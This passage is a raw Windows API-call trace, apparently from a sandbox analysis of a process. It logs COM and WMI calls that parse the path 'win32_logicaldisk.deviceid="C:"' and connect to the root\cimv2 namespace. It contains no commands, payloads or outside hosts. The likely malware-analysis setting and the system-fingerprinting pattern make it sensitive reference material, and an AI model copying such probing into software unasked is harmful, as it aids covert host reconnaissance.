| out: ppvObject=0x691ee44*=0x6030b00) returned 0x0 [0205.858] WbemDefPath:IUnknown:Release (This=0x60272b0) returned 0x0 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea64 | out: ppvObject=0x691ea64*=0x6030b00) returned 0x0 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ea20 | out: ppvObject=0x691ea20*=0x0) returned 0x80004002 [0205.858] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e37c | out: ppvObject=0x691e37c*=0x0) returned 0x80004002 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e32c | out: ppvObject=0x691e32c*=0x0) returned 0x80004002 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e338 | out: ppvObject=0x691e338*=0xbdf0f0) returned 0x0 [0205.858] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf0f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e340 | out: pCid=0x691e340*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.858] WbemDefPath:IUnknown:Release (This=0xbdf0f0) returned 0x3 [0205.858] CoGetContextToken (in: pToken=0x691e398 | out: pToken=0x691e398) returned 0x0 [0205.858] CoGetContextToken (in: pToken=0x691e7a0 | out: pToken=0x691e7a0) returned 0x0 [0205.858] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e830 | out: ppvObject=0x691e830*=0x0) returned 0x80004002 [0205.858] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0205.858] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0205.859] CoGetContextToken (in: pToken=0x691f128 | out: pToken=0x691f128) returned 0x0 [0205.859] CoGetContextToken (in: pToken=0x691f088 | out: pToken=0x691f088) returned 0x0 [0205.859] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x691f158*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f154 | out: ppvObject=0x691f154*=0x6030b00) returned 0x0 [0205.859] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0205.859] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0205.859] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.859] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0205.859] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2d8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2d8*=0x20, pszText=0x0) returned 0x0 [0205.859] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2d8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2d8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.859] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.031] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f2dc | out: puCount=0x691f2dc*=0x0) returned 0x0 [0206.031] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.031] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x691f2e4 | out: puResponse=0x691f2e4*=0xc19) returned 0x0 [0206.031] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f25c | out: puCount=0x691f25c*=0x0) returned 0x0 [0206.031] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x691f248 | out: puCount=0x691f248*=0x2) returned 0x0 [0206.032] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0x0, pszText=0x0 | out: puBuffLength=0x691f244*=0xf, pszText=0x0) returned 0x0 [0206.032] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x691f244*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f244*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.032] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f1f8 | out: ppv=0x691f1f8*=0xb51e34) returned 0x0 [0206.032] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f1f0 | out: pAptType=0x691f1f0*=1) returned 0x0 [0206.032] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f1f4 | out: ppvObject=0x691f1f4*=0x0) returned 0x80004002 [0206.032] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.033] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691eb60 | out: ppv=0x691eb60*=0x60272d0) returned 0x0 [0206.033] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272d0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691ed78 | out: ppvObject=0x691ed78*=0x0) returned 0x80004002 [0206.033] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272d0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ed8c | out: ppvObject=0x691ed8c*=0x60305c0) returned 0x0 [0206.033] WbemDefPath:IUnknown:Release (This=0x60272d0) returned 0x0 [0206.033] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9ac | out: ppvObject=0x691e9ac*=0x60305c0) returned 0x0 [0206.033] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691e968 | out: ppvObject=0x691e968*=0x0) returned 0x80004002 [0206.034] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0206.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e2c4 | out: ppvObject=0x691e2c4*=0x0) returned 0x80004002 [0206.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e274 | out: ppvObject=0x691e274*=0x0) returned 0x80004002 [0206.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e280 | out: ppvObject=0x691e280*=0xbe2530) returned 0x0 [0206.034] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2530, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e288 | out: pCid=0x691e288*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.034] WbemDefPath:IUnknown:Release (This=0xbe2530) returned 0x3 [0206.034] CoGetContextToken (in: pToken=0x691e2e0 | out: pToken=0x691e2e0) returned 0x0 [0206.034] CoGetContextToken (in: pToken=0x691e6e8 | out: pToken=0x691e6e8) returned 0x0 [0206.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e778 | out: ppvObject=0x691e778*=0x0) returned 0x80004002 [0206.034] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0206.034] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0206.034] CoGetContextToken (in: pToken=0x691f070 | out: pToken=0x691f070) returned 0x0 [0206.034] CoGetContextToken (in: pToken=0x691efd0 | out: pToken=0x691efd0) returned 0x0 [0206.034] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x691f0a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x691f09c | out: ppvObject=0x691f09c*=0x60305c0) returned 0x0 [0206.034] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0206.034] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0206.034] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0206.034] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f220 | out: puCount=0x691f220*=0x2) returned 0x0 [0206.034] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f21c*=0x0, pszText=0x0 | out: puBuffLength=0x691f21c*=0xf, pszText=0x0) returned 0x0 [0206.034] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x691f21c*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f21c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.035] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691f220 | out: ppv=0x691f220*=0xb51e34) returned 0x0 [0206.035] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x691f218 | out: pAptType=0x691f218*=1) returned 0x0 [0206.035] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x691f21c | out: ppvObject=0x691f21c*=0x0) returned 0x80004002 [0206.035] IUnknown:Release (This=0xb51e34) returned 0x1 [0206.036] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x691ee40 | out: ppv=0x691ee40*=0x6023bb8) returned 0x0 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x6023bb8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691f058 | out: ppvObject=0x691f058*=0x0) returned 0x80004002 [0206.036] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023bb8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f06c | out: ppvObject=0x691f06c*=0x60272e0) returned 0x0 [0206.036] WbemLocator:IUnknown:Release (This=0x6023bb8) returned 0x0 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ec8c | out: ppvObject=0x691ec8c*=0x60272e0) returned 0x0 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ec48 | out: ppvObject=0x691ec48*=0x0) returned 0x80004002 [0206.036] WbemLocator:IUnknown:AddRef (This=0x60272e0) returned 0x3 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e5a4 | out: ppvObject=0x691e5a4*=0x0) returned 0x80004002 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e554 | out: ppvObject=0x691e554*=0x0) returned 0x80004002 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e560 | out: ppvObject=0x691e560*=0x0) returned 0x80004002 [0206.036] CoGetContextToken (in: pToken=0x691e5c0 | out: pToken=0x691e5c0) returned 0x0 [0206.036] CoGetContextToken (in: pToken=0x691e9c8 | out: pToken=0x691e9c8) returned 0x0 [0206.036] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ea58 | out: ppvObject=0x691ea58*=0x0) returned 0x80004002 [0206.036] WbemLocator:IUnknown:Release (This=0x60272e0) returned 0x2 [0206.036] WbemLocator:IUnknown:Release (This=0x60272e0) returned 0x1 [0206.037] CoGetContextToken (in: pToken=0x691f038 | out: pToken=0x691f038) returned 0x0 [0206.037] CoGetContextToken (in: pToken=0x691ef98 | out: pToken=0x691ef98) returned 0x0 [0206.037] WbemLocator:IUnknown:QueryInterface (in: This=0x60272e0, riid=0x691f068*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x691f064 | out: ppvObject=0x691f064*=0x60272e0) returned 0x0 [0206.037] WbemLocator:IUnknown:AddRef (This=0x60272e0) returned 0x3 [0206.037] WbemLocator:IUnknown:Release (This=0x60272e0) returned 0x2 [0206.037] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x691f1fc | out: puCount=0x691f1fc*=0x2) returned 0x0 [0206.037] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x691f1f8*=0x0, pszText=0x0 | out: puBuffLength=0x691f1f8*=0xf, pszText=0x0) returned 0x0 [0206.037] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x691f1f8*=0xf, pszText="00000000000000" | out: puBuffLength=0x691f1f8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0206.037] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x691f0d4 | out: ppv=0x691f0d4*=0x60271c0) returned 0x0 [0206.037] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x691f168 | out: ppNamespace=0x691f168*=0x603368c) returned 0x0 [0206.345] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691f004 | out: ppvObject=0x691f004*=0xb5bd64) returned 0x0 [0206.346] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5bd64, pProxy=0x603368c, pAuthnSvc=0x691f054, pAuthzSvc=0x691f050, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c, pImpLevel=0x691f03c, pAuthInfo=0x691f040, pCapabilites=0x691f044 | out: pAuthnSvc=0x691f054*=0xa, pAuthzSvc=0x691f050*=0x0, pServerPrincName=0x691f048, pAuthnLevel=0x691f04c*=0x6, pImpLevel=0x691f03c*=0x2, pAuthInfo=0x691f040, pCapabilites=0x691f044*=0x1) returned 0x0 [0206.346] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x1 [0206.346] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff8 | out: ppvObject=0x691eff8*=0xb5bd84) returned 0x0 [0206.346] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691eff4 | out: ppvObject=0x691eff4*=0xb5bd64) returned 0x0 [0206.346] WbemLocator:IClientSecurity:SetBlanket (This=0xb5bd64, pProxy=0x603368c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0206.346] WbemLocator:IUnknown:Release (This=0xb5bd64) returned 0x2 [0206.346] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x1 [0206.346] CoTaskMemFree (pv=0xbd4858) [0206.346] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0206.347] WbemLocator:IUnknown:QueryInterface (in: This=0x603368c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691ebf4 | out: ppvObject=0x691ebf4*=0xb5bd84) returned 0x0 [0206.347] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x691ebb0 | out: ppvObject=0x691ebb0*=0x0) returned 0x80004002 [0206.347] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x691e9cc | out: ppvObject=0x691e9cc*=0x0) returned 0x80004002 [0206.348] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0206.348] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x691e50c | out: ppvObject=0x691e50c*=0x0) returned 0x80004002 [0206.348] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x691e4bc | out: ppvObject=0x691e4bc*=0x0) returned 0x80004002 [0206.349] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e4c8 | out: ppvObject=0x691e4c8*=0xb5bce4) returned 0x0 [0206.349] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5bce4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x691e4d0 | out: pCid=0x691e4d0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0206.349] WbemLocator:IUnknown:Release (This=0xb5bce4) returned 0x3 [0206.349] CoGetContextToken (in: pToken=0x691e528 | out: pToken=0x691e528) returned 0x0 [0206.349] CoGetContextToken (in: pToken=0x691e930 | out: pToken=0x691e930) returned 0x0 [0206.349] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691e9c0 | out: ppvObject=0x691e9c0*=0xb5bd6c) returned 0x0 [0206.349] WbemLocator:IRpcOptions:Query (in: This=0xb5bd6c, pPrx=0xb5bd84, dwProperty=2, pdwValue=0x691e9e8 | out: pdwValue=0x691e9e8) returned 0x80004002 [0206.349] WbemLocator:IUnknown:Release (This=0xb5bd6c) returned 0x3 [0206.349] WbemLocator:IUnknown:Release (This=0xb5bd84) returned 0x2 [0206.349] CoGetContextToken (in: pToken=0x691ef08 | out: pToken=0x691ef08) returned 0x0 [0206.349] CoGetContextToken (in: pToken=0x691ee68 | out: pToken=0x691ee68) returned 0x0 [0206.349] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x691ef38*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x691ef34 | out: ppvObject=0x691ef34*=0x603368c) returned 0x0 [0206.349] WbemLocator:IUnknown:AddRef (This=0x603368c) returned 0x4 [0206.349] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x3 [0206.350] WbemLocator:IUnknown:Release (This=0x603368c) returned 0x2 [0206.350] SysStringLen (param_1=0x0) returned 0x0 [0206.350] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x691f2cc | out: puCount=0x691f2cc*=0x0) returned 0x0 [0206.350] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2c8*=0x0, pszText=0x0 | out: puBuffLength=0x691f2c8*=0x20, pszText=0x0) returned 0x0 [0206.350] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x691f2c8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x691f2c8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0206.350] CoGetContextToken (in: pToken=0x691ef38 | out: pToken=0x691ef38) returned 0x0 [0206.350] WbemLocator:IUnknown:AddRef (This=0xb5bd84) returned 0x3 [0206.350] WbemLocator:IUnknown:QueryInterface (in: This=0xb5bd84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x691edcc | out: ppvObject=0x691edcc*=0xb5bd84) returned 0x0 [0206.350] 